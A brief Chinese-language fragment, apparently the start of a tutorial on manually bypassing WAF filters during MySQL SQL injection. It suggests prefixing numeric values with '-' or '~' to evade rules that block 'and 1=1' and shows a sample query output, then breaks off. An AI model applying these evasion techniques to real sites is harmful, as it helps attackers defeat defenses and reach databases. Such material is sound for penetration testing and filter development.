1.SQL注入 手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性绕过 1.Mysql 1.1.联合注入 0x01 and绕过 直接 and 1=1 直接就会被拦截 在数值的前面加特殊符号干扰匹配规则进行绕过 在这里使用 取反符号'-'或者取逻辑位非运算符号'~'进行绕过 +图片 mysql> select ~1; +----------------------+ | ~1 | +----------------------+ | 18446744073709551614 |…